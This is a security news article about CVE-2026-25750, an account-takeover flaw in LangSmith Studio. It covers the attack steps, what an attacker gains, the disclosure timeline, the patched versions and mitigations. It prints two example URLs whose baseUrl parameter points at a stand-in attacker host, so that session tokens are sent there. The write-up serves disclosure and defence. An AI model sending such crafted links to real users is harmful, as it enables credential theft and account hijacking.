A critical flaw in LangSmith—one of the most widely deployed AI observability platforms in enterprise environments—allowed unauthenticated attackers to steal live session credentials and seize full account control. No fake login page. No typed password. Just a link.
LangSmith, built by LangChain, sits at the center of how enterprises build, test, and monitor large language model (LLM) applications. It handles close to one billion events and tens of terabytes of data every day. The organizations using it are not hobbyists running side projects—they are companies with production AI systems processing customer records, financial data, internal knowledge bases, and proprietary business logic. When researchers at Miggo Security found a way to take over any authenticated LangSmith account with a single crafted URL, it was not a theoretical concern. It was a direct path into the operational core of an organization's AI infrastructure.
The vulnerability, formally tracked as CVE-2026-25750 and assigned a CVSS 4.0 base score of 8.5 (HIGH), was publicly disclosed through a LangChain Security Advisory on January 7, 2026. The underlying flaw had already been patched in cloud deployments by December 15, 2025, and in self-hosted instances by December 20, 2025. No active exploitation was confirmed prior to disclosure, but the attack surface was wide open and the impact of successful exploitation would have been severe.
What LangSmith Is and Why It Is a High-Value Target
LangSmith is the observability and debugging layer for LLM-powered applications built on the LangChain framework and compatible tooling. Developers use it to trace execution flows, inspect inputs and outputs, monitor latency and cost, evaluate model behavior, and debug production incidents. It is the platform that sees everything a deployed AI system does.
That visibility is precisely what makes it dangerous to compromise. A LangSmith account does not simply hold configuration settings. It holds trace data: the raw, unfiltered record of what your AI system received as input, how it processed it, what tools it called, what those tools returned, and what it ultimately sent back to the user. Traces are built for debugging, which means they are designed to capture information in full fidelity. While LangSmith supports masking of specific fields, those controls are optional and inconsistently applied in practice.
In other words, an attacker who gains access to a LangSmith account may be able to read the internal SQL queries your AI agent runs against your database. They may be able to read the CRM records it pulls. They may be able to extract the system prompt—the proprietary instruction set that defines how your AI behaves—which represents the distilled engineering investment of your entire AI product team. This is not a generic data breach. It is a targeted window into an organization's decision-making logic and operational data.
The Vulnerability: URL Parameter Injection via baseUrl
The flaw is classified under CWE-74: Improper Neutralization of Special Elements in Output Used by a Downstream Component (Injection), specifically as a URL parameter injection vulnerability. To understand how it works, it helps to first understand the feature it exploits.
LangSmith Studio, the browser-based interface for interacting with the platform, is designed with flexibility in mind. Developers frequently need to run Studio locally or point it at different backend environments—staging, production, self-hosted instances—while still authenticating against their cloud account. To support this, Studio accepts a baseUrl query parameter in the URL. When set, this parameter instructs the frontend to direct all API requests to the specified server rather than the default LangChain backend.
The design is sensible for developer convenience. The security failure was elementary: the application performed no validation on the destination domain. It accepted any value passed via baseUrl and sent authenticated API requests, including live bearer tokens, user IDs, and workspace IDs, directly to that destination. An attacker who could convince an authenticated user to load a URL containing an attacker-controlled baseUrl value would receive those credentials automatically, without any further action from the victim.
The crafted URL for a cloud deployment looked like this:
https://smith.langchain.com/studio/?baseUrl=https://attacker-server.com
For self-hosted deployments, the pattern was identical, substituting the organization's own LangSmith domain:
https://<YOUR_LANGSMITH_DOMAIN>/studio/?baseUrl=https://attacker-server.com
No exploit code. No memory corruption. No authentication bypass in the traditional sense. The application was functioning exactly as designed—it was just designed to trust input it should have rejected.
Attack Mechanics: How the Exploit Unfolds
The attack requires one precondition: the target must be an authenticated LangSmith user at the time of exploitation. From there, the sequence is straightforward and does not require the victim to take any action beyond visiting a URL or a webpage that loads one automatically.
The attacker first sets up a server under their control configured to log incoming HTTP requests in full, capturing all headers and parameters. They then deliver the crafted LangSmith URL to the target—via a phishing email, a message in a collaboration tool, a compromised website, or hostile JavaScript embedded in any page the victim visits. When the authenticated victim's browser loads the URL, LangSmith Studio initializes as normal and begins making API calls—but it sends those calls, along with the victim's active bearer token, user ID, and workspace ID, directly to the attacker's server rather than to LangChain's backend.
This is fundamentally different from traditional credential phishing. In a standard phishing attack, the attacker must replicate a login page convincingly enough that the victim enters their username and password. That attack relies on the victim being deceived into an active choice. CVE-2026-25750 requires no such deception at the credential level. The victim never sees a fake login form. The credentials are transmitted automatically by the victim's own browser, behaving exactly as it was designed to—just pointed at the wrong destination.
"A logged-in LangSmith user could be compromised merely by accessing an attacker-controlled site or by clicking a malicious link." — Liad Eliyahu and Eliana Vuijsje, Miggo Security
Once the attacker receives the session token, the clock starts. The bearer token has a five-minute validity window. Within that window, the attacker can use the token to authenticate to the real LangSmith API and perform any action the victim's account is authorized to take. Depending on the victim's role within their organization, that could mean read access to trace data, administrative access to workspace settings, or the ability to delete projects and alter configurations.
Self-hosted LangSmith administrators who have not yet upgraded to version 0.12.71 (Helm chart langsmith-0.12.33 or later) remain vulnerable. Cloud customers on the LangSmith SaaS platform were protected by December 15, 2025. The self-hosted patch was released December 20, 2025. Verify your deployment version immediately.
What an Attacker Gains
The consequences of a successful account takeover in an AI observability platform are categorically different from those in a standard SaaS application. This is not a case where an attacker steals a profile or accesses a user's stored documents. LangSmith sits downstream of every AI interaction an organization's systems perform, and its trace data reflects that.
Miggo Security's research outlined three primary categories of what a successful attacker can access and do:
- Exfiltrate tool inputs and outputs. AI trace records capture the raw data that flows in and out of every tool call an LLM agent makes. This includes query results from internal databases, API responses from connected services, and any data processed during execution. That data may contain personally identifiable information (PII), protected health information (PHI), financial records, or proprietary business data.
- Steal system prompts. The system prompt is the foundational instruction set that defines how an AI behaves—its persona, its constraints, its access rules, its reasoning priorities. In enterprise AI products, the system prompt represents significant engineering and business investment. Exposure of a system prompt gives a competitor or adversary an immediate understanding of an organization's AI strategy, safety design, and behavioral guardrails.
- Hijack the account. Beyond data exfiltration, the attacker can modify workspace settings, alter project configurations, and delete data. In a production AI operations environment, destructive changes to an observability platform can degrade monitoring capabilities exactly when an organization needs them most.
The research also noted something that tends to be overlooked in discussions of observability platform security: traces are designed to capture everything for debugging purposes, and the masking controls that exist are not always applied. In many real-world deployments, internal SQL queries, CRM customer records, and proprietary source code appear in trace data in plain text because no one specifically configured those fields to be redacted.
"This vulnerability is a reminder that AI observability platforms are now critical infrastructure. As these tools prioritize developer flexibility, they often inadvertently bypass security guardrails." — Liad Eliyahu and Eliana Vuijsje, Miggo Security
Discovery, Disclosure, and Patching
CVE-2026-25750 was discovered by Miggo Security researchers Liad Eliyahu and Eliana Vuijsje, who published their technical findings on March 12, 2026. The responsible disclosure timeline, however, began months earlier. Miggo disclosed the vulnerability to LangChain on December 1, 2025. LangChain remediated the issue on the SaaS platform by December 15, 2025—two weeks after initial disclosure—and shipped a patch for self-hosted deployments on December 20, 2025. The formal security advisory from LangChain was published on January 7, 2026, at which point the company confirmed no evidence of exploitation in the wild had been observed.
The patching approach itself illustrates an important structural characteristic of SaaS security. Because the vulnerability resided in the hosted platform rather than in a distributed software package, LangChain was able to patch every cloud user simultaneously with a single deployment. No customer action was required. This centralized remediation model is one of the genuine security advantages of SaaS, even though it also means that a single unpatched flaw exposes an entire user base at once.
For self-hosted administrators, the situation is different. The patch exists, but applying it requires deliberate action. Organizations running LangSmith on their own infrastructure must upgrade to version 0.12.71 or Helm chart langsmith-0.12.33 to be protected. Those who have not yet done so remain exposed.
LangChain addressed the issue by implementing domain validation on the baseUrl parameter, ensuring that the frontend will only route API requests to approved destinations rather than accepting arbitrary attacker-supplied values. The fix is straightforward from an implementation standpoint—an allowlist or strict origin check—but the fact that it was absent from a platform processing this volume of sensitive enterprise data reflects a broader gap in how AI tooling vendors approach security review during feature development.
"LangChain treats LangSmith as security-critical infrastructure and continues to invest in preventative controls, defensive reviews, and responsible disclosure processes to support enterprise use cases." — LangChain Security Advisory, January 7, 2026
The Broader Signal for AI Infrastructure Security
CVE-2026-25750 did not emerge from a novel class of attack technique. URL parameter injection is a well-understood vulnerability type, present in CWE catalogs and security curricula for years. What makes this disclosure significant is not the mechanics of the flaw but where it was found and what it could reach.
The AI tooling ecosystem has expanded at a pace that has consistently outrun its security maturity. Frameworks, observability platforms, agent orchestrators, and model serving infrastructure have been built rapidly, often by teams prioritizing developer experience and deployment speed. Security review of complex application logic—as opposed to dependency scanning or automated SAST—requires time and expertise that many of these projects have not yet invested in. Miggo's researchers specifically noted that the structural gap they identified in LangSmith's business logic was the kind that automated scanners miss. It took human analysis to find it.
This disclosure also arrives alongside a cluster of related findings across the AI infrastructure stack. In the same period, Miggo Security and other researchers disclosed vulnerabilities in SGLang (CVE-2026-3059 and CVE-2026-3060, both rated CVSS 9.8) that allow unauthenticated remote code execution through unsafe pickle deserialization. BeyondTrust disclosed a DNS exfiltration technique against Amazon Bedrock AgentCore's code execution sandbox. The pattern is consistent: AI infrastructure, built for capability, has not yet been hardened for adversarial conditions at the same rate it has been deployed into sensitive environments.
For security teams, the practical implication is that AI observability and orchestration platforms need to be treated with the same scrutiny applied to any other piece of critical infrastructure. Access controls, token management, data sanitization before ingestion into monitoring layers, and regular security review of platform configurations are not optional enhancements. They are baseline requirements for any organization running production AI workloads.
For organizations running self-hosted LangSmith specifically, the remediation steps remain active: upgrade to version 0.12.71, ensure that sensitive data fields are masked before they reach the trace layer, apply least-privilege access controls to workspace users, and audit API key permissions regularly. Multi-factor authentication, where the platform supports it, adds a layer of protection against session token misuse even in cases where a token is intercepted within its validity window.
Key Takeaways
- The flaw is a URL parameter injection, not a traditional phishing attack. CVE-2026-25750 required no credential entry from victims. A single link caused the victim's browser to automatically transmit live session tokens to an attacker's server, bypassing the need for a fake login page entirely.
- AI observability platforms carry a unique blast radius. Compromise of a LangSmith account exposes not just user data but the operational core of an organization's AI systems: trace histories, internal database query results, system prompts, and the business logic governing AI behavior.
- Cloud users were patched centrally; self-hosted users must act. LangChain deployed a fix to all SaaS users by December 15, 2025. Self-hosted deployments remain unprotected until administrators upgrade to LangSmith version 0.12.71 or Helm chart langsmith-0.12.33 or later.
- Automated scanners missed this. Miggo's researchers found the vulnerability through manual analysis of application logic. Security teams cannot rely solely on automated tooling to identify structural flaws in complex AI platform behavior.
- AI infrastructure is now a primary attack surface. This disclosure is part of a pattern. SGLang, Amazon Bedrock, and LangSmith all surfaced significant vulnerabilities within the same disclosure window. Organizations deploying AI tooling at scale need dedicated security review processes for that tooling, not assumptions that developer-facing platforms are lower-risk.
The architecture of modern AI systems creates new attack surfaces that security teams are still learning to map. LangSmith sits at the intersection of application logic and sensitive data by design—that intersection is precisely why it is useful, and precisely why compromising it carries consequences that extend well beyond a standard account breach. CVE-2026-25750 is a textbook case of a developer convenience feature becoming an attacker's entry point, and it will not be the last one found in the AI observability space.
Sources
- Miggo Security — Hack the AI Brain: Uncovering an Account Takeover Vulnerability in LangSmith (March 12, 2026)
- LangChain — LangSmith Security Advisory (January 7, 2026)
- GitHub Security Advisory — GHSA-r8wq-jwgw-p7: LangSmith Studio URL Parameter Injection
- Vulnerability-Lookup / CIRCL — CVE-2026-25750 Entry
- The Hacker News — AI Flaws in Amazon Bedrock, LangSmith, and SGLang Enable Data Exfiltration and RCE (March 17, 2026)
- Cyber Security News — Critical LangSmith Account Takeover Vulnerability Puts Users at Risk (March 14, 2026)